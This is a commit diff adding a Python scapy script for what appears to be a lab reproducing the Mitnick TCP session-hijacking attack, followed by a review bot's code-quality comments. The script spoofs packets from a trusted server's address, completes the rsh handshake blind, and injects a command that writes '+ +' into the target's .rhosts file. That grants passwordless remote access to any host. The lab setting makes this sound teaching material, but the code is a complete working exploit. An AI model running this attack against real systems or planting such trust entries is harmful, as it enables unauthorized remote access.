tcp and mitnick lab finished
76
Mitnick/Labsetup/volumes/mitnick_final.py
Normal file
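--- a/Mitnick/Labsetup/volumes/mitnick_final.py
+++ b/Mitnick/Labsetup/volumes/mitnick_final.py
@@ -0,0 +1,76 @@
+#!/usr/bin/python3
+from scapy.all import *
+import time
+import threading
+
+X_IP = "10.9.0.5"
+SRV_IP = "10.9.0.6"
+X_PORT = 514
+SRV_PORT = 1023
+SECOND_PORT = 1022
+IFACE = "br-63cae30f0395"
+
+def mitnick_attack():
+    my_seq = 0x12345678
+
+    # State flags
+    handshake_done = False
+    second_conn_done = False
+
+    def handle_pkt(pkt):
+        nonlocal handshake_done, second_conn_done
+        if not pkt.haslayer(TCP):
+            return
+
+        # First Connection: SYN+ACK
+        if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
+            print(f"Received SYN+ACK. Seq: {pkt[TCP].seq}")
+
+            # Send ACK
+            ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1)
+            send(ack_pkt, verbose=0, iface=IFACE)
+            print("Sent ACK")
+
+            # Send RSH data
+            command = "echo + + > /home/seed/.rhosts"
+            data = f"{SECOND_PORT}\x00seed\x00seed\x00{command}\x00"
+            psh_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                      TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
+                          seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
+            send(psh_pkt, verbose=0, iface=IFACE)
+            print(f"Sent RSH data: {command}")
+            handshake_done = True
+
+        # Second Connection: SYN
+        elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
+            print(f"Received SYN for second connection. Seq: {pkt[TCP].seq}")
+
+            # Send SYN+ACK
+            srv_seq2 = 0x99999999
+            sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
+                     TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
+                         seq=srv_seq2, ack=pkt[TCP].seq + 1)
+            send(sa_pkt, verbose=0, iface=IFACE)
+            print("Sent SYN+ACK for second connection")
+            second_conn_done = True
+
+    # Start sniffer in a thread
+    print("Starting Sniffer...")
+    t = threading.Thread(target=lambda: sniff(iface=IFACE, filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15))
+    t.start()
+
+    time.sleep(1) # Give sniffer time to start
+
+    # Step 1: Send spoofed SYN
+    print(f"Step 1: Sending spoofed SYN to {X_IP}:{X_PORT}")
+    ip = IP(src=SRV_IP, dst=X_IP)
+    tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
+    send(ip/tcp, verbose=0, iface=IFACE)
+
+    t.join()
+    print("Attack script finished.")
+
+if __name__ == "__main__":
+    mitnick_attack()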
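Review bot: The `handshake_done` and `second_conn_done` flags written inside `handle_pkt` are never read anywhere in `mitnick_attack`, so the closing `print("Attack script finished.")` runs after the 15 s sniff timeout whether or not either handler ever fired, and a silent failure (wrong `IFACE`, no SYN+ACK seen on the bridge) looks identical to success. Reporting the flags at the end, e.g. `print(f"Attack script finished. handshake_done={handshake_done}, second_conn_done={second_conn_done}")`, would make the outcome of a lab run visible without changing what the script does. `from scapy.all import *` also hides where `IP`, `TCP`, `send` and `sniff` come from; `from scapy.all import IP, TCP, send, sniff` names the four symbols actually used. A module docstring stating that the addresses, ports and the `IFACE` bridge name are specific to the lab network, and that the script's only output is the console prints, would help the next reader of this lab setup.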